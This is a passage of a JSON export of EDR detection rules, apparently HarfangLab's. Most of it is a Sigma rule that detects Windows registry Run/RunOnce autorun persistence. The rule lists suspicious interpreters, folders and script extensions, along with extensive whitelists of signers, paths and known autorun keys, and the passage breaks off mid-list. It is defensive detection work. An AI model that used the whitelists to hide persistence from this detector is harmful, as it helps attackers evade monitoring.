"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.014"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "970dca0d-7bda-4ab7-a60c-a23fa59e6627",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620588Z",
"creation_date": "2026-03-23T11:45:34.620590Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620595Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/",
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_persistence_registry_asep.yml",
"content": "title: Registry Autorun Key Added\nid: 970dca0d-7bda-4ab7-a60c-a23fa59e6627\ndescription: |\n Detects when a suspicious entry is added or modified in one of the autostart extensibility points (ASEP) in the registry, which may indicate an attempt to establish persistence.\n Autostart extensibility points are registry locations that Windows uses to automatically execute programs during system startup or user logon. Common ASEP locations include Run and RunOnce keys under \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" and \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\". Attackers frequently abuse these registry keys to achieve persistence by adding entries that reference malicious executables, scripts, or commands. This technique allows malware to survive system reboots and maintain a foothold on the compromised system without requiring user interaction.\n It is recommended to investigate the process that created or modified the registry key, examine the target executable or command referenced in the registry value and verify whether the entry corresponds to legitimate software.\nreferences:\n - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2020/09/24\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains:\n # run keys (run / runonce / runonceex / runservices / runservicesonce )\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\'\n # covers RunOnce and RunOnce\\Setup\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'\n - 
'\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'\n # covers RunOnceEx\\000x\\value and RunOnceEx\\000x\\Depend\\value\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\'\n\n # This is handled by the rule fd2e4d65-00d6-4661-a5f4-ad92fe8d4540\n filter_suspicious:\n - Details|contains:\n - 'rundll32.exe'\n - 'pwsh.exe'\n - 'powershell.exe'\n - 'cmd.exe'\n - 'mshta.exe'\n - 'wscript.exe'\n - 'cscript.exe'\n - '\\AppData\\Roaming\\'\n - '\\Users\\Public\\'\n - '\\Users\\Default\\'\n - '\\PerfLogs\\'\n - Details|endswith:\n # wscript\n - '.js'\n - '.jse'\n - '.vbs'\n - '.vbe'\n - '.vb'\n - '.vba'\n - '.wsf'\n - '.wsh'\n # mshta\n - '.hta'\n # powershell\n - '.ps1'\n - '.psc1'\n - '.psm1'\n - '.psd1'\n # misc, behaves like .exe but uncommon\n - '.cmd'\n - '.com'\n - '.pif'\n - '.scr'\n\n filter_innocent_values:\n Details:\n - 'DWORD (0x00000000)'\n - 'DWORD (0x00000001)'\n - '\"\"'\n - '1'\n - '(Empty)'\n - ' '\n\n # This is handled by the rule 907e5765-e7f7-4b8f-886c-749bf315fe52\n filter_remote:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k localService -p -s RemoteRegistry'\n - '?:\\Windows\\system32\\svchost.exe -k LocalService'\n - '?:\\Windows\\system32\\svchost.exe -k regsvc'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_harfanglab:\n 
Details:\n - '?:\\ProgramData\\HarfangLab\\ui\\hurukai-ui.exe --no-open'\n - '\"?:\\ProgramData\\HarfangLab\\ui\\hurukai-ui.exe\" --no-open'\n\n # HKU\\S-1-5-21-948834541-...HKU\\S-1-5-21-948834541-1531591341-313593124-37104\\Software\\Microsoft\\Windows\\CurrentVersion\\Group Policy Objects\\FILHETALLARD.COM{3A3A79CC-4140-4224-A5B6-382E203215F9}User\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\**delvals.XXXXX{3A3A79CC-4140-4224-bbbb-aaaaaaaa}User\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\**delvals.\n exclusion_gpo_path:\n Image: '?:\\Windows\\System32\\mmc.exe'\n TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Group Policy Objects\\'\n\n # We have a specific rule for that\n exclusion_loadappinit:\n TargetObject:\n - 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs'\n - 'HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs'\n\n exclusion_programfiles:\n # to avoid a lot of FP, we WL everything that is set to be launched from program files\n # attackers rarely set a foot here, and they need admin privileges to do so anyway\n - Details|contains:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - '%ProgramFiles%\\'\n - '?:\\PROGRA~2\\'\n - Image|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - '?:\\PROGRA~2\\'\n\n exclusion_system_folder:\n - Details|contains:\n - '%windir%\\System32\\'\n - '%windir%\\Syswow64\\'\n - '%windir%\\Speech\\'\n - '%windir%\\dwrcs\\'\n - '%systemroot%\\System32\\'\n - '%systemroot%\\Syswow64\\'\n - '%systemroot%\\Speech\\'\n - '%systemroot%\\dwrcs\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\Syswow64\\'\n - '?:\\Windows\\Speech\\'\n - '?:\\windows\\dwrcs\\'\n - ProcessParentImage|startswith: '?:\\Windows\\SoftwareDistribution\\'\n\n exclusion_known_programdata:\n Details|contains:\n - '?:\\ProgramData\\Lenovo\\'\n - '?:\\ProgramData\\bomgar-scc'\n 
- '?:\\ProgramData\\citrix\\'\n - '?:\\ProgramData\\G Data\\'\n\n exclusion_trusted_signers:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Airtame ApS'\n - 'Barco N.V.' # ClickShare\n - 'Bitdefender SRL'\n - 'Bluestack Systems, Inc'\n - 'Bomgar Corporation'\n - 'Canva'\n - 'Centile Telecom Applications'\n - 'DeepL GmbH'\n - 'DeepL SE'\n - 'DEEZER SA'\n - 'Dell Inc'\n - 'Dropbox, Inc'\n - 'Facebook, Inc.'\n - 'Google LLC'\n - 'GoTo Technologies USA, LLC'\n - 'InfoCert SpA'\n - 'JetBrains s.r.o.'\n - 'Lenovo'\n - 'LINE Corporation'\n - 'Logitech Inc'\n - 'LogMeIn, Inc.'\n - 'Movavi Software Limited'\n - 'nordvpn s.a.'\n - 'ONELAUNCH TECHNOLOGIES INC.'\n - 'Opera Norway AS'\n - 'Realtek Semiconductor Corp.'\n - 'RingCentral, Inc.'\n - 'Seagull Scientific Inc.'\n - 'Signal Messenger, LLC'\n - 'Symantec Corporation'\n - 'Tixeo SARL'\n - 'Tixeo SAS'\n\n exclusion_drivers:\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\EF694770.srv\n # C:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\E_YARNMAE.EXE /FU \"?:\\ProgramData\\EPSON\\STM3\\E_S19E9.tmp\"\n Image: '*\\Windows\\System32\\spool\\drivers\\\\*'\n\n exclusion_image:\n Image:\n # c:\\users\\XXX\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe\n - '*\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n - '?:\\Windows\\System32\\StikyNot.exe'\n - '?:\\ProgramData\\McAfee\\Agent\\\\*'\n - '?:\\windows\\temp\\\\????????-????-????-????-????????????\\dismhost.exe'\n - '?:\\\\?WINDOWS.?BT\\Work\\\\????????-????-????-????-????????????\\DismHost.exe'\n - '?:\\windows\\system32\\drvinst.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\WindowsUpdateBox.exe'\n\n exclusion_onedrive:\n ProcessOriginalFileName: 'OneDriveSetup.exe'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_onedrive_setup:\n # Image: C:\\Users\\LocalAdmin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\n # Command Line 
C:\\Users\\LocalAdmin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe /update /restart /updateSource:ODSU /peruser /childprocess /extractFilesWithLessThreadCount /enableExtractCabV2 /renameReplaceOneDriveExe /renameReplaceODSUExe\n # Target Object HKU\\S-1-5-21-3308534374-32794409-4022623240-1105\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Standalone Update Binary\n # Details C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\LocalAdmin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\"\n Image|endswith:\n - '\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe'\n - '\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Standalone Update Binary'\n Details|contains: '\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe'\n\n exclusion_windefender:\n Image: '*\\MsMpEng.exe'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsDefender'\n Details|endswith: '\\Windows Defender\\MSASCuiL.exe\"' # \"%ProgramFiles%\\Windows Defender\\MSASCuiL.exe\"\n\n exclusion_adobe_flash:\n # C:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_32_0_0_101_pepper.exe\n # C:\\Windows\\System32\\Macromed\\Flash\\FlashUtil32_32_0_0_414_Plugin.exe\n Image:\n - '?:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil*'\n - '?:\\Windows\\system32\\Macromed\\Flash\\FlashUtil*'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\FlashPlayerUpdate'\n\n exclusion_cisco_webex:\n Image|endswith:\n - '\\AppData\\Local\\WebEx\\ciscowebexstart.exe'\n - '\\AppData\\Local\\WebEx\\WebEx\\Applications\\ptsrv.exe'\n - '\\AppData\\Local\\WebEx\\WebexHost.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\CiscoMeetingDaemon'\n\n exclusion_cisco_spark:\n Details|endswith:\n - 
'\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Webex\\Webex.lnk* /minimized /autostartedWithWindows=true'\n - 'ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Webex\\Webex.lnk* /minimized /autostartedWithWindows=true'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\CiscoSpark'\n\n exclusion_cisco_proximity:\n Details|endswith: '\\AppData\\Roaming\\Cisco\\Proximity\\proximity.exe\" --autostart'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Cisco Proximity'\n\n exclusion_securityhealth:\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\securityhealth'\n # %windir%\\system32\\securityhealthsystray.exe\n Details: '?windir?\\system32\\securityhealthsystray.exe'\n\n exclusion_azure_information_protection:\n Image|endswith: 'AzInfoProtection.exe'\n TargetObject|startswith: 'HKLM\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce'\n Details|contains: 'AzInfoProtection.exe'\n\n exclusion_power_plan_restore:\n Image: '?:\\Windows\\System32\\WinSAT.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\WinSATRestorePower'\n Details|startswith: 'powercfg'\n\n exclusion_teams_install:\n # image : msiexec\n Image: '?:\\Windows\\System32\\msiexec.exe'\n TargetObject: 'HKLM\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\TeamsMachineInstaller'\n Details|contains: 'Teams Installer\\Teams.exe'\n\n exclusion_userinit_ctfmon:\n TargetObject|endswith: 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Runonce\\ctfmon.exe'\n Details|contains: 'ctfmon.exe /n'\n\n exclusion_mspwdregistration:\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\passwordregistration'\n Details: '?:\\windows\\system32\\mspwdregistration.exe'\n\n # chromium, but unsigned\n exclusion_chromium_appdata:\n Image|endswith: '\\AppData\\Local\\chromium\\Application\\chrome.exe'\n Details|contains: 
'\\AppData\\Local\\chromium\\Application\\chrome.exe'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleChromeAutoLaunch_*'\n\n exclusion_msedge_appdata:\n Image|endswith: '\\AppData\\Local\\Microsoft\\Edge\\Application\\msedge.exe'\n Details|contains: '\\AppData\\Local\\Microsoft\\Edge\\Application\\msedge.exe'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MicrosoftEdgeAutoLaunch_*'\n\n exclusion_yandex_appdata:\n Image|endswith: '\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe'\n Details|contains: '\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleChromeAutoLaunch_*'\n\n exclusion_avast_appdata:\n Image|endswith: '\\AppData\\Local\\AVAST Software\\Browser\\Application\\AvastBrowser.exe'\n Details|contains: '\\AppData\\Local\\AVAST Software\\Browser\\Application\\AvastBrowser.exe'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\AvastBrowserAutoLaunch_*'\n\n exclusion_citrix_multiple:\n Image: '?:\\Windows\\System32\\msiexec.exe'\n ProcessSignature: 'Microsoft Windows'\n Details|endswith:\n - '\\AppData\\Local\\Citrix\\ICA Client\\concentr.exe\" /startup'\n - '\\AppData\\Local\\Citrix\\ICA Client\\Receiver\\AnalyticsSrv.exe\" /Startup'\n\n exclusion_discord:\n TargetObject|endswith: 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord'\n # ?:\\ProgramData\\XXXXX\\Discord\\Update.exe --processStart Discord.exe --process-start-args --start-minimized\n # C:\\Users\\XXXX\\AppData\\Local\\Discord\\Update.exe --processStart Discord.exe\n Details|contains|all:\n - 'Discord\\Update.exe'\n - '--processStart Discord.exe'\n\n exclusion_utorrent:\n TargetObject|endswith:\n - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\uTorrent'\n - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ut' # seen from 2021 ?\n Details|contains: 'AppData\\Roaming\\uTorrent\\uTorrent.exe'\n\n 
exclusion_viber:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Viber'\n Details|contains: 'AppData\\Local\\Viber\\Viber.exe'\n\n exclusion_rocketdock:\n Image: '*\\rocketdock\\rocketdock.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\rocketdock'\n\n exclusion_vmware_thaw:\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\symcprovidercleanup'\n Details: '?:\\windows\\post-thaw-script.bat'\n\n exclusion_rtscm:\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\rtscm'\n Details: 'rtscm64.exe'\n\n exclusion_stardock_fences:\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\fences'\n Details|contains: '\\fences.exe /startup'\n\n exclusion_opera:\n Image|endswith: '\\assistant_installer.exe'\n Details|endswith: '\\AppData\\Local\\Programs\\Opera\\assistant\\browser_assistant.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Browser Assistant'\n\n exclusion_opera_launcher:\n Image|endswith:\n - '\\AppData\\Local\\Programs\\Opera\\opera.exe'\n - '\\AppData\\Local\\Programs\\Opera\\\\*\\opera.exe'\n Details|endswith:\n - '\\AppData\\Local\\Programs\\Opera\\launcher.exe'\n - '\\AppData\\Local\\Programs\\Opera\\opera.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Stable'\n\n exclusion_opera_gx:\n Image|endswith: '\\AppData\\Local\\Programs\\Opera GX\\opera.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera GX Stable'\n Details|contains: '\\AppData\\Local\\Programs\\Opera GX\\launcher.exe'\n\n exclusion_brave:\n Image: '*\\AppData\\Local\\BraveSoftware\\Brave-Browser\\Application\\brave.exe'\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleChromeAutoLaunch_????????????????????????????????'\n\n exclusion_braveupdate:\n Image|endswith: '\\BraveUpdate.exe'\n TargetObject|endswith: 
'\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\BraveSoftware Update'\n\n exclusion_runonce_known_fp:\n TargetObject:\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\\\?????????-????-????-????-?????????????' # one ? at begining and end to match { and }\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\RollbackOnline'\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\GrpConv'\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\InstallShieldSetup'\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\DXTempFolder' # DirectX setup\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\IM_Resume'\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ ISSetupPrerequisistes' # indeed a space before ISS\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ ISSetupPrerequisistes' # indeed 2 spaces before ISS\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\WAB Migrate' # details : %ProgramFiles%\\Windows Mail\\wab.exe /Upgrade\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\wextract_cleanup*'\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\msedge_cleanup*'\n # HKU\\XXXX\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart #0 set by csrss.exe\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart *'\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NetworkResetPostReboot' # set by C:\\Windows\\System32\\sdiagnhost.exe / contains \"netsh.exe trace postreset\"\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Adobe Speed Launcher' # set by C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe\n\n exclusion_run_known_fp:\n TargetObject:\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\ISUSPM'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDriveSetup'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Lync'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\GrpConv' # (cisco any connect secure mobility client)\n - 
'*\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleDriveFS' # google Drive File Stream\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Cisco Jabber'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Zoom' # Zoom\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\PulseSecure' # VPN pulse secure\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\VUEMUIAgent-Launcher'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\AdobeAAMUpdater*'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\F5 Networks VPN Cleanup*'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Adobe ARM'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\PTOneClick'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\PTIM.exe'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Sidebar'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Greenshot'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\AutorunsDisabled\\\\*' # (entries disabled by autoruns)\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.Teams.Teams' # MS teams\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\TeamsMachineUninstallerLocalAppData' # MS teams\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\TeamsMachineUninstallerProgramData' # MS teams (details %ProgramData%\\Microsoft\\Teams\\Update.exe --uninstall --msiUninstall --source=default)\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\PSUAMain' # Panda antivirus (details \"C:\\Program Files (x86)\\Panda Security\\WAC\\PSUAMain.exe\" /LaunchSysTray )\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.slack.slack' # slack\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.lifen.Lifen' # lifen\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Edge Update'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\RTKUGUI' # ( pointe vers rtkugui64.exe dans system32)\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\DymoQuickPrint'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\TortoiseSVN Monitor'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\ISM' # (intel software 
manager)\n # HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Terminal Server\\Install\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ultracopier\n # HKU\\S-....\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ultracopier\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\ultracopier' # supercopier software\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Dropbox'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Dropbox Update'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\RtkAudUService' # C:\\Windows\\System32\\DriverStore\\FileRepository\\hdxsstm.inf_amd64_1a1e8196b6801ccf\\RtkAudUService64.exe\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Spotify' # C:\\Users\\XXXXX\\AppData\\Roaming\\Spotify\\Spotify.exe --autostart --minimized\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft.Lists' # C:\\Users\\XXXXX\\AppData\\Local\\Microsoft\\OneDrive\\21.180.0905.0007\\Microsoft.SharePoint.exe\n - '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\CapsLock Indicator'\n\n exclusion_citrix_ica_client:\n Image|endswith: '\\Windows\\System32\\msiexec.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ConnectionCenter'\n Details|endswith: 'concentr.exe\" /startup'\n\n exclusion_clickshare:\n TargetObject|endswith: 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ClickShare'\n Details|contains: '\\AppData\\Local\\ClickShare\\ClickShare.exe'\n\n exclusion_gosign_desktop:\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\\*\\AppData\\Local\\InfoCert\\GoSign Desktop\\GoSignDesktop.exe'\n Details|contains: '*\\AppData\\Local\\InfoCert\\GoSign Desktop\\GoSignDesktop.exe'\n\n exclusion_bingwallpaperapp:\n Image: '?:\\Windows\\System32\\msiexec.exe'\n ProcessSignature: 'Microsoft Windows'\n Details: '*\\AppData\\Local\\Microsoft\\BingWallpaperApp\\BingWallpaperApp.exe'\n\n exclusion_mattermost_reg:\n Image: '?:\\Windows\\System32\\reg.exe'\n TargetObject: 
'*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Mattermost'\n Details: '*\\AppData\\Local\\Programs\\mattermost-desktop\\Mattermost.exe*'\n\n exclusion_loom:\n Image|endswith: 'AppData\\Local\\Programs\\Loom\\Loom.exe'\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\electron.app.Loom'\n Details: '*\\AppData\\Local\\Programs\\Loom\\Loom.exe*'\n\n exclusion_letsignit:\n Image:\n - '?:\\Windows\\System32\\reg.exe'\n - '?:\\Windows\\SysWOW64\\reg.exe'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Letsignit App'\n Details:\n - '*\\AppData\\Local\\LetsignitApp\\update.exe*'\n - '*\\AppData\\Local\\Microsoft\\LetsignitApp\\update.exe*'\n - '*\\AppData\\Local\\LetsignitApp\\app-?.?.?\\Letsignit App.exe*'\n\n exclusion_letsignit2:\n ProcessParentDescription: 'Letsignit App'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Letsignit SAS'\n\n exclusion_setuphost:\n # C:\\$WINDOWS.~BT\\Sources\\setuphost.exe\n Image: '?:\\\\?WINDOWS.?BT\\Sources\\setuphost.exe'\n # C:\\Windows\\SoftwareDistribution\\Download\\065fd01c95189f768f95256d0434663a\\WindowsUpdateBox.exe\n ProcessParentImage: '*\\sources\\setupprep.exe'\n\n exclusion_realtek:\n Image|endswith: '\\Setup.exe'\n TargetObject|endswith: '\\RunOnce\\RealtekHDAUpgrade'\n Details: 'RealtekHDAUpgrade'\n ProcessCommandLine|contains|all:\n - ' -no_selfdeleter -IS_temp -media_path:'\n - ' -tempdisk1folder:'\n - ' -IS_OriginalLauncher:'\n\n exclusion_dashlane:\n Image|endswith: '\\DashlaneInstaller.exe'\n ProcessParentImage|endswith: '\\AppData\\Roaming\\Dashlane\\Dashlane.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\DashlanePlugin'\n\n exclusion_figma:\n Image|endswith: '\\AppData\\Local\\FigmaAgent\\figma_agent.exe'\n Details|endswith:\n - '\\AppData\\Local\\FigmaAgent\\figma_agent.exe'\n - '\\AppData\\Local\\FigmaAgent\\figma_agent.exe\"'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Figma 
Agent'\n\n exclusion_move_mouse:\n Image|endswith: '\\move mouse.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\move mouse'\n\n exclusion_aventail:\n Image|endswith: '\\appdata\\roaming\\aventail\\ewpca\\ewpca.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\betproxy'\n\n exclusion_kaijet_wormhole:\n Image: '*\\appdata\\roaming\\kaijet\\wormhole1107\\functmodules\\\\?92eedb7d-755a-4a90-a79d-c0bd0acf1a7f?\\wormhole.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\cs dispatch'\n\n exclusion_cacaoweb:\n Image|endswith: '\\AppData\\Roaming\\cacaoweb\\cacaoweb.exe'\n ProcessSignature: 'CACAOWEB Ltd'\n Details|contains: '\\AppData\\Roaming\\cacaoweb\\cacaoweb.exe'\n\n exclusion_atlassian:\n TargetObject|endswith: 